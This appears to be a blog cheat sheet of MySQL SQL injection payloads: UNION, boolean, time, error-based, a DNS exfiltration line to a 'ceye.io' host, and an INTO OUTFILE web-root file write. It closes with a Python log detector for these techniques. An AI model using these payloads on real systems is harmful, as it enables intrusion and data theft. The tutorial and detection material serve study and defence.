Query Statements

I. Basic Usage

1. CONCAT(str1,str2,str3) joins the strings into one new string

SELECT CONCAT('a','b','c');

2. LENGTH(str) returns the number of characters in the string str

SELECT LENGTH('abc');

3. LEFT(str,n) takes the leftmost n characters of the string

SELECT LEFT('abc',1);

4. right(str,n) takes the rightmost n characters of the string

SELECT right('abc',1);

5. substr(str,m,n) takes n characters of the string starting at position m; positions start at 1

substring and mid behave the same as substr

SELECT substr('abc',2,1);

II. UNION-based Queries

1. Enumerate databases

SELECT * FROM admin where id=1 UNION select (select GROUP_CONCAT(schema_name) from information_schema.schemata),2,3;

2. Enumerate tables

SELECT * FROM admin where id=1 UNION select ( select GROUP_CONCAT(table_name) from information_schema.tables where table_schema=database()),2,3;

3. Enumerate columns

SELECT * FROM admin where id=1 UNION select (select GROUP_CONCAT(column_name) from information_schema.columns where table_name='admin'),2,3;

4. Fetch row contents

SELECT * FROM admin where id=1 UNION select (select CONCAT(name,0x5c,age) from admin LIMIT 0,1),2,3;

5. Query without parentheses

SELECT * FROM admin where id=1 UNION select column_name,2,3 FROM information_schema.columns where table_name='admin';

III. Boolean-based Injection

select schema_name from information_schema.schemata;

SELECT * FROM admin where id=1 and mid((select schema_name from information_schema.schemata LIMIT 0,1),1,1)='i';


IV. Time-based Injection

SELECT * FROM admin where id=1 OR (if(mid((select schema_name from information_schema.schemata LIMIT 0,1),1,1)='i',SLEEP(5),1));

V. Error-based Injection

1. FLOOR

SELECT * FROM admin where id=1
and
(SELECT 1 FROM (select COUNT(*),CONCAT((select GROUP_CONCAT(schema_name) from information_schema.schemata),FLOOR(rand(0)*2))x FROM information_schema.TABLES GROUP BY x)a)

2. extractvalue

SELECT * FROM admin where id=1
and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))

3. updatexml

SELECT * FROM admin where id=1
and(select updatexml(1,concat(0x7e,(select group_concat(table_name)from information_schema.tables where table_schema=database())),0x7e))

VI. DNS-based Injection

1. UNC (Universal Naming Convention) is the Windows convention for naming network resources (such as printers)

2. When the injection point is blind, DNS-based injection can be used (prerequisite: secure_file_priv is not NULL)

SHOW VARIABLES LIKE '%secure_file_priv%';

3. On the http://ceye.io/profile platform, find your domain xxx.ceye.io

4. Execute the statement

select * from admin where id = 4 and if((select load_file(concat('\\\\',(select database()),'.xxx.ceye.io\\abc'))),1,0);

VII. Injection Workflow

1. First determine the current user

select current_user();

2. Determine the current user's privileges (read/write permissions)

select File_priv from mysql.user where user='root' and host='localhost';

3. Check whether file export is currently possible

-- NULL means export is not allowed; an empty value means it is allowed; a path means export is only allowed into that directory
show variables like "secure_file_priv";

-- blind query
SELECT 1 AND if(substr((select @@global.secure_file_priv),1,1)='N',sleep(5),2);

-- union-based
SELECT 1 union SELECT @@global.secure_file_priv;

-- error-based
SELECT 1 and extractvalue(1, concat(0x7e, (select @@global.secure_file_priv),0x7e))

4. Write out a file

select "<?php phpinfo();?>" into outfile 'C:/phpstudy_pro/WWW/phpinfo.php';

5. Read a file

select load_file("C:/phpstudy_pro/WWW/phpinfo.php");
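Every technique on this page leaves distinctive text in the MySQL general query log (or in an application's own query logging), which is where a defender can pick it up. The detector below is an added example written for this page, not the author's code: it tags each logged statement with the technique family it matches. The log rows are constructed to replay the statements shown above, and the signatures are assumptions to tune against your own traffic.

```python
import re

# Signatures for the injection primitives catalogued on this page (constructed for
# this example; tune them against your own traffic before relying on them).
SIGNATURES = {
    "union_schema_enum": re.compile(
        r"\bunion\b.*\binformation_schema\.(schemata|tables|columns)\b", re.I | re.S),
    "boolean_blind": re.compile(
        r"\b(and|or)\b\s*\(?\s*(mid|substr|substring)\s*\(\s*\(\s*select\b", re.I | re.S),
    "time_blind": re.compile(r"\b(sleep|benchmark)\s*\(", re.I),
    "error_based": re.compile(r"\b(extractvalue|updatexml)\s*\(|\bfloor\s*\(\s*rand\s*\(", re.I),
    "oob_dns": re.compile(r"\bload_file\s*\(.*\\\\", re.I | re.S),  # UNC path inside load_file
    "file_io": re.compile(r"\binto\s+(out|dump)file\b|\bload_file\s*\(|secure_file_priv", re.I),
}

# One MySQL general_log text row: "<timestamp>\t<connection id> Query\t<sql>"
LOG_ROW = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")

def classify_query(sql):
    """Return the sorted list of technique labels whose signature matches this SQL text."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(sql))

def scan_log(rows):
    """Parse general_log rows; return (connection id, labels) for each query that matched."""
    hits = []
    for row in rows:
        m = LOG_ROW.match(row.rstrip("\n"))
        if not m:          # Connect/Quit rows and other non-query noise
            continue
        labels = classify_query(m.group("sql"))
        if labels:
            hits.append((int(m.group("conn")), labels))
    return hits

# Constructed general_log rows replaying the statements shown on this page.
SAMPLE_LOG = [
    "2021-02-24T08:26:01.000000Z\t   12 Connect\troot@localhost on testdb",
    "2021-02-24T08:26:02.000000Z\t   12 Query\tSELECT * FROM admin where id=1",
    "2021-02-24T08:26:03.000000Z\t   12 Query\tSELECT * FROM admin where id=1 UNION select (select GROUP_CONCAT(schema_name) from information_schema.schemata),2,3",
    "2021-02-24T08:26:04.000000Z\t   12 Query\tSELECT * FROM admin where id=1 and mid((select schema_name from information_schema.schemata LIMIT 0,1),1,1)='i'",
    "2021-02-24T08:26:05.000000Z\t   12 Query\tSELECT * FROM admin where id=1 and(select extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=database()))))",
    "2021-02-24T08:26:06.000000Z\t   13 Query\tselect * from admin where id = 4 and if((select load_file(concat('\\\\\\\\',(select database()),'.xxx.ceye.io\\\\abc'))),1,0)",
    "2021-02-24T08:26:07.000000Z\t   13 Query\tselect \"<?php phpinfo();?>\" into outfile 'C:/phpstudy_pro/WWW/phpinfo.php'",
]

if __name__ == "__main__":
    for conn, labels in scan_log(SAMPLE_LOG):
        print(f"conn {conn}: {', '.join(labels)}")
```

Enabling general_log on a busy server is costly; the same classifier runs unchanged over a proxy capture or the application's own query log.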

posted @ 2021-02-24 16:26  lnterpreter  Views (188)  Comments (0)